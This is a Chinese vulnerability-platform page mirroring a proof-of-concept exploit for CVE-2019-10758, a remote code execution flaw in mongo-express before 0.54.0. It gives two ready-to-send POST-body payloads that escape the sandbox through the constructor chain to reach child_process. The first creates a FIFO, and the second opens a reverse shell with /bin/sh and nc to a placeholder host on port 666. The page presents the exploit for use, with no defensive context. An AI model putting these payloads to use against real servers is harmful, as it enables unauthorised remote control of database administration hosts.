漏洞平台

POC详情： ab3e4b0f68f404c62ac3b02f55fd8c178cb9d79b

来源

https://github.com/lp008/CVE-2019-10758

关联漏洞

标题： mongo-express 安全漏洞 (CVE-2019-10758)
描述：mongo-express是一款用于交互式管理MongoDB数据库的、基于Web的轻量级管理界面。 mongo-express 0.54.0之前版本中存在安全漏洞。攻击者可借助使用toBSON方法的端点利用该漏洞执行代码。

描述

CVE-2019-10758

介绍

# CVE-2019-10758
mongo-express远程代码执行，反弹shell代码如下：

POST BODY 1:

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("mkfifo /tmp/f")

POST BODY 2：

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("cat /tmp/f | /bin/sh -i 2>%261 | nc x.x.x.x 666 >/tmp/f")

文件快照


 [4.0K]  /data/pocs/ab3e4b0f68f404c62ac3b02f55fd8c178cb9d79b
└── [ 392]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。